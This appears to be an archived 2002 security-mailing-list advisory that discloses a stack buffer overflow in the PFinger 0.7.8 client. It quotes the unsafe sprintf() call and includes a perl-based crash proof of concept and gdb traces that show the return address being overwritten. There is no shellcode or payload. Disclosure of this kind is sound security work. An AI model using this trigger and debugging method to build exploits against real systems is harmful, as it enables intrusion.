PFinger Buffer Overflow Vulnerability.

From: dong-h0un U (xploitat_private)
Date: Tue Jun 04 2002 - 08:14:54 PDT

  • Next message: zillion: "SRT Security Advisory (SRT2002-06-04-1011): slurp"

     PFinger Buffer Overflow Vulnerability.
    
    
     * Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)
    
     * Overview:
    
     Pfinger program has arrangement extent overflow bug.
     This is that is found in client.
     It did not confirm whether server side is weak.
    
     Similar various kinds bug may exist anyway. :-(
    
     * Description:
    
     This happens as arrangement "query(size 100)" becomes overflow.
     Of course, even if use (-l, -d, -t) option, cause same result.
     Because this uses wrongly sprintf(), is happened. (line:144)
    
     === pfinger-0.7.8/src/finger.c =================================
    
     :
     :
     int main( int   argc, char *argv[] )
     {
      int flag;
      char *progname;
      int info = 0;
      char *hostname;
      char query[100]; 
      :
      :
      sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
                      ~~~~~~~~
      DoFinger1(hostname, query);
      optind++;
     }  
     :
     :
    
     ================================================================
     
     Next, Stack is stored as following.
    
     query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];
    
     * Proof of concept:
    
     [x82@xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     Segmentation fault
     [x82@xpl017elz src]$ gcc -v
     Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
     gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) 
     [x82@xpl017elz src]$
    
     - Debugging -
    
     [x82@xpl017elz src]$ gdb -q ./finger
     (gdb) r -l `perl -e 'print "x"x100'`
     Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
     x"x100'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     
     Program received signal SIGSEGV, Segmentation fault.
     0x4005000a in _ufc_foobar () from /lib/libc.so.6
     (gdb) r -l `perl -e 'print "x"x101'`
     
     Program received signal SIGSEGV, Segmentation fault.
     0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
     (gdb) r -l `perl -e 'print "x"x102'`
     
     Program received signal SIGSEGV, Segmentation fault.
     0xa0d78 in ?? ()
     (gdb)
    
     (gdb) r -l `perl -e 'print "x"x105'`
     Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
     x"x105'`
     finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
     
     Program received signal SIGSEGV, Segmentation fault.
     0x400a4b53 in strrchr () from /lib/libc.so.6
     (gdb) where
     #0  0x400a4b53 in strrchr () from /lib/libc.so.6
     #1  0xbffff564 in ?? ()
     #2  0x78787878 in ?? ()
     Cannot access memory at address 0x78787878.
     (gdb)    
    
     P.S: Sorry, my poor english.
    
     __
     By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
     E-mail: szoahcat_private
     Home: http://x82.i21c.net
    
    
    -- 
    
    Powered by Outblaze
    



    This archive was generated by hypermail 2b30 : Tue Jun 04 2002 - 10:24:33 PDT